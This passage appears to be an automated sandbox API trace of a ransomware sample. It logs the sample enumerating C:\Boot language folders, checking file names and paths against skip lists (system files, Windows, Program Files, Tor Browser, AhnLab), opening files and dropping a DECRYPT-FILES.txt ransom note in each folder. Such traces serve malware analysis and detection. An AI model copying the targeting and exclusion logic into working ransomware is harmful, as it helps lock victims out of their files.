lpFindFileData=0x3f2f3cc*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xa6bf5e60, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xa6bf5e60, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0071.339] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0071.339] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0071.339] FindNextFileW (in: hFindFile=0x5f8c18, lpFindFileData=0x3f2f3cc | out: lpFindFileData=0x3f2f3cc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0d3720, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe868d5aa, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x15640, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0071.339] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="DECRYPT-FILES.txt") returned -1 [0071.339] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="autorun.inf") returned 1 [0071.339] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="boot.ini") returned 1 [0071.339] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="desktop.ini") returned -1 [0071.339] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="ntuser.dat") returned -1 [0071.339] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="iconcache.db") returned -1 [0071.339] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="bootsect.bak") returned -1 [0071.339] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="ntuser.dat.log") returned -1 [0071.339] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="thumbs.db") returned -1 [0071.339] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="Bootfont.bin") returned 1 [0071.339] lstrlenW (lpString="bootmgr.exe.mui") returned 15 [0071.339] lstrcmpiW (lpString1="mui", lpString2="lnk") returned 1 [0071.339] lstrcmpiW (lpString1="mui", lpString2="exe") returned 1 [0071.339] lstrcmpiW (lpString1="mui", lpString2="sys") returned -1 [0071.339] lstrcmpiW (lpString1="mui", lpString2="dll") returned 1 [0071.339] lstrlenW (lpString="C:\\Boot\\sv-SE\\") returned 14 [0071.339] lstrlenW (lpString="bootmgr.exe.mui") returned 15 [0071.339] lstrcpyW (in: lpString1=0x3f2eb9c, lpString2="C:\\Boot\\sv-SE\\" | out: lpString1="C:\\Boot\\sv-SE\\") returned="C:\\Boot\\sv-SE\\" [0071.339] lstrcatW (in: lpString1="C:\\Boot\\sv-SE\\", lpString2="bootmgr.exe.mui" | out: lpString1="C:\\Boot\\sv-SE\\bootmgr.exe.mui") returned="C:\\Boot\\sv-SE\\bootmgr.exe.mui" [0071.339] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0xfb0000 [0071.340] CreateFileW (lpFileName="C:\\Boot\\sv-SE\\bootmgr.exe.mui" (normalized: "c:\\boot\\sv-se\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0071.341] CloseHandle (hObject=0x0) returned 0 [0071.341] VirtualFree (lpAddress=0xfb0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0071.341] FindNextFileW (in: hFindFile=0x5f8c18, lpFindFileData=0x3f2f3cc | out: lpFindFileData=0x3f2f3cc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa6bf5e60, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xa6bf5e60, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xa6bf5e60, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x23fc, dwReserved0=0x0, dwReserved1=0x0, cFileName="DECRYPT-FILES.txt", cAlternateFileName="DECRYP~1.TXT")) returned 1 [0071.341] lstrcmpiW (lpString1="DECRYPT-FILES.txt", lpString2="DECRYPT-FILES.txt") returned 0 [0071.341] FindNextFileW (in: hFindFile=0x5f8c18, lpFindFileData=0x3f2f3cc | out: lpFindFileData=0x3f2f3cc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa6bf5e60, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xa6bf5e60, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xa6bf5e60, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="jkbimi8.tmp", cAlternateFileName="")) returned 1 [0071.341] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="DECRYPT-FILES.txt") returned 1 [0071.341] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="autorun.inf") returned 1 [0071.341] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="boot.ini") returned 1 [0071.341] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="desktop.ini") returned 1 [0071.341] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="ntuser.dat") returned -1 [0071.341] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="iconcache.db") returned 1 [0071.341] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="bootsect.bak") returned 1 [0071.341] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="ntuser.dat.log") returned -1 [0071.341] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="thumbs.db") returned -1 [0071.341] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="Bootfont.bin") returned 1 [0071.341] lstrlenW (lpString="jkbimi8.tmp") returned 11 [0071.341] lstrcmpiW (lpString1="tmp", lpString2="lnk") returned 1 [0071.341] lstrcmpiW (lpString1="tmp", lpString2="exe") returned 1 [0071.341] lstrcmpiW (lpString1="tmp", lpString2="sys") returned 1 [0071.341] lstrcmpiW (lpString1="tmp", lpString2="dll") returned 1 [0071.341] lstrlenW (lpString="C:\\Boot\\sv-SE\\") returned 14 [0071.341] lstrlenW (lpString="jkbimi8.tmp") returned 11 [0071.341] lstrcpyW (in: lpString1=0x3f2eb9c, lpString2="C:\\Boot\\sv-SE\\" | out: lpString1="C:\\Boot\\sv-SE\\") returned="C:\\Boot\\sv-SE\\" [0071.341] lstrcatW (in: lpString1="C:\\Boot\\sv-SE\\", lpString2="jkbimi8.tmp" | out: lpString1="C:\\Boot\\sv-SE\\jkbimi8.tmp") returned="C:\\Boot\\sv-SE\\jkbimi8.tmp" [0071.342] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0xfb0000 [0071.342] CreateFileW (lpFileName="C:\\Boot\\sv-SE\\jkbimi8.tmp" (normalized: "c:\\boot\\sv-se\\jkbimi8.tmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0071.342] CloseHandle (hObject=0x0) returned 0 [0071.342] VirtualFree (lpAddress=0xfb0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0071.342] FindNextFileW (in: hFindFile=0x5f8c18, lpFindFileData=0x3f2f3cc | out: lpFindFileData=0x3f2f3cc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa6bf5e60, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xa6bf5e60, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xa6bf5e60, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="jkbimi8.tmp", cAlternateFileName="")) returned 0 [0071.342] FindClose (in: hFindFile=0x5f8c18 | out: hFindFile=0x5f8c18) returned 1 [0071.342] CloseHandle (hObject=0x420) returned 1 [0071.342] FindNextFileW (in: hFindFile=0x5f8bd8, lpFindFileData=0x3f2f648 | out: lpFindFileData=0x3f2f648*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0d3720, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0d3720, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="tr-TR", cAlternateFileName="")) returned 1 [0071.342] lstrcmpW (lpString1="tr-TR", lpString2=".") returned 1 [0071.342] lstrcmpW (lpString1="tr-TR", lpString2="..") returned 1 [0071.343] lstrcatW (in: lpString1="tr-TR", lpString2="\\" | out: lpString1="tr-TR\\") returned="tr-TR\\" [0071.343] lstrcatW (in: lpString1="C:\\Boot\\", lpString2="tr-TR\\" | out: lpString1="C:\\Boot\\tr-TR\\") returned="C:\\Boot\\tr-TR\\" [0071.343] StrStrW (lpFirst="C:\\Boot\\tr-TR\\", lpSrch="\\Program Files") returned 0x0 [0071.343] StrStrW (lpFirst="C:\\Boot\\tr-TR\\", lpSrch=":\\Windows") returned 0x0 [0071.343] StrStrW (lpFirst="C:\\Boot\\tr-TR\\", lpSrch="\\Games\\") returned 0x0 [0071.343] StrStrW (lpFirst="C:\\Boot\\tr-TR\\", lpSrch="\\Tor Browser\\") returned 0x0 [0071.343] StrStrW (lpFirst="C:\\Boot\\tr-TR\\", lpSrch="\\ProgramData\\") returned 0x0 [0071.343] StrStrW (lpFirst="C:\\Boot\\tr-TR\\", lpSrch="\\cache2\\entries\\") returned 0x0 [0071.343] StrStrW (lpFirst="C:\\Boot\\tr-TR\\", lpSrch="\\Low\\Content.IE5\\") returned 0x0 [0071.343] StrStrW (lpFirst="C:\\Boot\\tr-TR\\", lpSrch="\\User Data\\Default\\Cache\\") returned 0x0 [0071.343] StrStrW (lpFirst="C:\\Boot\\tr-TR\\", lpSrch="\\All Users") returned 0x0 [0071.343] StrStrW (lpFirst="C:\\Boot\\tr-TR\\", lpSrch="\\IETldCache\\") returned 0x0 [0071.343] StrStrW (lpFirst="C:\\Boot\\tr-TR\\", lpSrch="\\Local Settings\\") returned 0x0 [0071.343] StrStrW (lpFirst="C:\\Boot\\tr-TR\\", lpSrch="\\AppData\\Local") returned 0x0 [0071.343] StrStrW (lpFirst="C:\\Boot\\tr-TR\\", lpSrch="AhnLab") returned 0x0 [0071.343] StrStrW (lpFirst="C:\\Boot\\tr-TR\\", lpSrch="{0AFACED1-E828-11D1-9187-B532F1E9575D}") returned 0x0 [0071.343] lstrlenW (lpString="C:\\Boot\\tr-TR\\") returned 14 [0071.343] lstrlenW (lpString="jkbimi8.tmp") returned 11 [0071.343] wsprintfW (in: param_1=0x3f2ebac, param_2="%s\\%s" | out: param_1="C:\\Boot\\tr-TR\\\\jkbimi8.tmp") returned 26 [0071.343] CreateFileW (lpFileName="C:\\Boot\\tr-TR\\\\jkbimi8.tmp" (normalized: "c:\\boot\\tr-tr\\jkbimi8.tmp"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000000, hTemplateFile=0x0) returned 0x420 [0071.343] lstrlenW (lpString="C:\\Boot\\tr-TR\\") returned 14 [0071.343] lstrlenW (lpString="DECRYPT-FILES.txt") returned 17 [0071.343] wsprintfW (in: param_1=0x3f2ebac, param_2="%s\\%s" | out: param_1="C:\\Boot\\tr-TR\\\\DECRYPT-FILES.txt") returned 32 [0071.343] CreateFileW (lpFileName="C:\\Boot\\tr-TR\\\\DECRYPT-FILES.txt" (normalized: "c:\\boot\\tr-tr\\decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x424 [0071.344] WriteFile (in: hFile=0x424, lpBuffer=0xf70000*, nNumberOfBytesToWrite=0x23fc, lpNumberOfBytesWritten=0x3f2eba8, lpOverlapped=0x0 | out: lpBuffer=0xf70000*, lpNumberOfBytesWritten=0x3f2eba8*=0x23fc, lpOverlapped=0x0) returned 1 [0071.345] CloseHandle (hObject=0x424) returned 1 [0071.345] lstrlenW (lpString="C:\\Boot\\tr-TR\\") returned 14 [0071.345] lstrcatW (in: lpString1="C:\\Boot\\tr-TR\\", lpString2="*" | out: lpString1="C:\\Boot\\tr-TR\\*") returned="C:\\Boot\\tr-TR\\*" [0071.345] FindFirstFileW (in: lpFileName="C:\\Boot\\tr-TR\\*", lpFindFileData=0x3f2f3cc | out: lpFindFileData=0x3f2f3cc*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xa6bf5e60, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xa6bf5e60, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5f8c18 [0071.345] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0071.345] FindNextFileW (in: hFindFile=0x5f8c18, lpFindFileData=0x3f2f3cc | out: lpFindFileData=0x3f2f3cc*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xa6bf5e60, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xa6bf5e60, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0071.345] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0071.345] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0071.345] FindNextFileW (in: hFindFile=0x5f8c18, lpFindFileData=0x3f2f3cc | out: lpFindFileData=0x3f2f3cc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0d3720, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe8393ab6, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x15440, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0071.345] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="DECRYPT-FILES.txt") returned -1 [0071.346] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="autorun.inf") returned 1 [0071.346] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="boot.ini") returned 1 [0071.346] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="desktop.ini") returned -1 [0071.346] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="ntuser.dat") returned -1 [0071.346] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="iconcache.db") returned -1 [0071.346] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="bootsect.bak") returned -1 [0071.346] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="ntuser.dat.log") returned -1 [0071.346] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="thumbs.db") returned -1 [0071.346] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="Bootfont.bin") returned 1 [0071.346] lstrlenW (lpString="bootmgr.exe.mui") returned 15 [0071.346] lstrcmpiW (lpString1="mui", lpString2="lnk") returned 1 [0071.346] lstrcmpiW (lpString1="mui", lpString2="exe") returned 1 [0071.346] lstrcmpiW (lpString1="mui", lpString2="sys") returned -1 [0071.346] lstrcmpiW (lpString1="mui", lpString2="dll") returned 1 [0071.346] lstrlenW (lpString="C:\\Boot\\tr-TR\\") returned 14 [0071.346] lstrlenW (lpString="bootmgr.exe.mui") returned 15 [0071.346] lstrcpyW (in: lpString1=0x3f2eb9c, lpString2="C:\\Boot\\tr-TR\\" | out: lpString1="C:\\Boot\\tr-TR\\") returned="C:\\Boot\\tr-TR\\" [0071.346] lstrcatW (in: lpString1="C:\\Boot\\tr-TR\\", lpString2="bootmgr.exe.mui" | out: lpString1="C:\\Boot\\tr-TR\\bootmgr.exe.mui") returned="C:\\Boot\\tr-TR\\bootmgr.exe.mui" [0071.346] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0xfb0000 [0071.346] CreateFileW (lpFileName="C:\\Boot\\tr-TR\\bootmgr.exe.mui" (normalized: "c:\\boot\\tr-tr\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0071.346] CloseHandle (hObject=0x0) returned 0 [0071.346] VirtualFree (lpAddress=0xfb0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0071.347] FindNextFileW (in: hFindFile=0x5f8c18, lpFindFileData=0x3f2f3cc | out: lpFindFileData=0x3f2f3cc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa6bf5e60, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xa6bf5e60, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xa6bf5e60, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x23fc, dwReserved0=0x0, dwReserved1=0x0, cFileName="DECRYPT-FILES.txt", cAlternateFileName="DECRYP~1.TXT")) returned 1 [0071.347] lstrcmpiW (lpString1="DECRYPT-FILES.txt", lpString2="DECRYPT-FILES.txt") returned 0 [0071.347] FindNextFileW (in: hFindFile=0x5f8c18, lpFindFileData=0x3f2f3cc | out: lpFindFileData=0x3f2f3cc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa6bf5e60, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xa6bf5e60, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xa6bf5e60, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="jkbimi8.tmp", cAlternateFileName="")) returned 1 [0071.347] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="DECRYPT-FILES.txt") returned 1 [0071.347] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="autorun.inf") returned 1 [0071.347] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="boot.ini") returned 1 [0071.347] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="desktop.ini") returned 1 [0071.347] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="ntuser.dat") returned -1 [0071.347] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="iconcache.db") returned 1 [0071.347] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="bootsect.bak") returned 1 [0071.347] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="ntuser.dat.log") returned -1 [0071.347] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="thumbs.db") returned -1 [0071.347] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="Bootfont.bin") returned 1 [0071.347] lstrlenW (lpString="jkbimi8.tmp") returned 11 [0071.347] lstrcmpiW (lpString1="tmp", lpString2="lnk") returned 1 [0071.347] lstrcmpiW (lpString1="tmp", lpString2="exe") returned 1 [0071.347] lstrcmpiW (lpString1="tmp", lpString2="sys") returned 1 [0071.347] lstrcmpiW (lpString1="tmp", lpString2="dll") returned 1 [0071.347] lstrlenW (lpString="C:\\Boot\\tr-TR\\") returned 14 [0071.347] lstrlenW (lpString="jkbimi8.tmp") returned 11 [0071.347] lstrcpyW (in: lpString1=0x3f2eb9c, lpString2="C:\\Boot\\tr-TR\\" | out: lpString1="C:\\Boot\\tr-TR\\") returned="C:\\Boot\\tr-TR\\" [0071.347] lstrcatW (in: lpString1="C:\\Boot\\tr-TR\\", lpString2="jkbimi8.tmp" | out: lpString1="C:\\Boot\\tr-TR\\jkbimi8.tmp") returned="C:\\Boot\\tr-TR\\jkbimi8.tmp" [0071.347] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0xfb0000 [0071.347] CreateFileW (lpFileName="C:\\Boot\\tr-TR\\jkbimi8.tmp" (normalized: "c:\\boot\\tr-tr\\jkbimi8.tmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0071.348] CloseHandle (hObject=0x0) returned 0 [0071.348] VirtualFree (lpAddress=0xfb0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0071.348] FindNextFileW (in: hFindFile=0x5f8c18, lpFindFileData=0x3f2f3cc | out: lpFindFileData=0x3f2f3cc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa6bf5e60, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xa6bf5e60, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xa6bf5e60, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="jkbimi8.tmp", cAlternateFileName="")) returned 0 [0071.348] FindClose (in: hFindFile=0x5f8c18 | out: hFindFile=0x5f8c18) returned 1 [0071.348] CloseHandle (hObject=0x420) returned 1 [0071.348] FindNextFileW (in: hFindFile=0x5f8bd8, lpFindFileData=0x3f2f648 | out: lpFindFileData=0x3f2f648*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0d3720, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0d3720, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="zh-CN", cAlternateFileName="")) returned 1 [0071.348] lstrcmpW (lpString1="zh-CN", lpString2=".") returned 1 [0071.348] lstrcmpW (lpString1="zh-CN", lpString2="..") returned 1 [0071.348] lstrcatW (in: lpString1="zh-CN", lpString2="\\" | out: lpString1="zh-CN\\") returned="zh-CN\\" [0071.348] lstrcatW (in: lpString1="C:\\Boot\\", lpString2="zh-CN\\" | out: lpString1="C:\\Boot\\zh-CN\\") returned="C:\\Boot\\zh-CN\\" [0071.348] StrStrW (lpFirst="C:\\Boot\\zh-CN\\", lpSrch="\\Program Files") returned 0x0 [0071.348] StrStrW (lpFirst="C:\\Boot\\zh-CN\\", lpSrch=":\\Windows") returned 0x0 [0071.348] StrStrW (lpFirst="C:\\Boot\\zh-CN\\", lpSrch="\\Games\\") returned 0x0 [0071.348] StrStrW (lpFirst="C:\\Boot\\zh-CN\\", lpSrch="\\Tor Browser\\") returned 0x0 [0071.348] StrStrW (lpFirst="C:\\Boot\\zh-CN\\", lpSrch="\\ProgramData\\") returned 0x0 [0071.348] StrStrW (lpFirst="C:\\Boot\\zh-CN\\", lpSrch="\\cache2\\entries\\") returned 0x0 [0071.348] StrStrW (lpFirst="C:\\Boot\\zh-CN\\", lpSrch="\\Low\\Content.IE5\\") returned 0x0 [0071.349] StrStrW (lpFirst="C:\\Boot\\zh-CN\\", lpSrch="\\User Data\\Default\\Cache\\") returned 0x0 [0071.349] StrStrW (lpFirst="C:\\Boot\\zh-CN\\", lpSrch="\\All Users") returned 0x0 [0071.349] StrStrW (lpFirst="C:\\Boot\\zh-CN\\", lpSrch="\\IETldCache\\") returned 0x0 [0071.349] StrStrW (lpFirst="C:\\Boot\\zh-CN\\", lpSrch="\\Local Settings\\") returned 0x0 [0071.349] StrStrW (lpFirst="C:\\Boot\\zh-CN\\", lpSrch="\\AppData\\Local") returned 0x0 [0071.349] StrStrW (lpFirst="C:\\Boot\\zh-CN\\", lpSrch="AhnLab") returned 0x0 [0071.349] StrStrW (lpFirst="C:\\Boot\\zh-CN\\", lpSrch="{0AFACED1-E828-11D1-9187-B532F1E9575D}") returned 0x0 [0071.349] lstrlenW (lpString="C:\\Boot\\zh-CN\\") returned 14 [0071.349] lstrlenW (lpString="jkbimi8.tmp") returned 11 [0071.349] wsprintfW (in: param_1=0x3f2ebac, param_2="%s\\%s" | out: param_1="C:\\Boot\\zh-CN\\\\jkbimi8.tmp") returned 26 [0071.349] CreateFileW (lpFileName="C:\\Boot\\zh-CN\\\\jkbimi8.tmp" (normalized: "c:\\boot\\zh-cn\\jkbimi8.tmp"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000000, hTemplateFile=0x0) returned 0x420 [0071.349] lstrlenW (lpString="C:\\Boot\\zh-CN\\") returned 14 [0071.349] lstrlenW (lpString="DECRYPT-FILES.txt") returned 17 [0071.349] wsprintfW (in: param_1=0x3f2ebac, param_2="%s\\%s" | out: param_1="C:\\Boot\\zh-CN\\\\DECRYPT-FILES.txt") returned 32 [0071.349] CreateFileW (lpFileName="C:\\Boot\\zh-CN\\\\DECRYPT-FILES.txt" (normalized: "c:\\boot\\zh-cn\\decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x424 [0071.350] WriteFile (in: hFile=0x424, lpBuffer=0xf70000*, nNumberOfBytesToWrite=0x23fc, lpNumberOfBytesWritten=0x3f2eba8, lpOverlapped=0x0 | out: lpBuffer=0xf70000*, lpNumberOfBytesWritten=0x3f2eba8*=0x23fc, lpOverlapped=0x0) returned 1 [0071.351] CloseHandle (hObject=0x424) returned 1 [0071.351] lstrlenW (lpString="C:\\Boot\\zh-CN\\") returned 14 [0071.351] lstrcatW (in: lpString1="C:\\Boot\\zh-CN\\", lpString2="*" | out: lpString1="C:\\Boot\\zh-CN\\*") returned="C:\\Boot\\zh-CN\\*" [0071.351] FindFirstFileW (in: lpFileName="C:\\Boot\\zh-CN\\*", lpFindFileData=0x3f2f3cc | out: lpFindFileData=0x3f2f3cc*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xa6bf5e60, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xa6bf5e60, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5f8c18 [0071.351] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0071.351] FindNextFileW (in: hFindFile=0x5f8c18, lpFindFileData=0x3f2f3cc | out: lpFindFileData=0x3f2f3cc*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xa6bf5e60, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xa6bf5e60, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0071.351] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0071.351] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0071.351] FindNextFileW (in: hFindFile=0x5f8c18, lpFindFileData=0x3f2f3cc | out: lpFindFileData=0x3f2f3cc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0d3720, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe8725b0e, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x11440, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0071.351] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="DECRYPT-FILES.txt") returned -1 [0071.351] lstrcmpiW (lpString1="bootmgr.exe.mui", 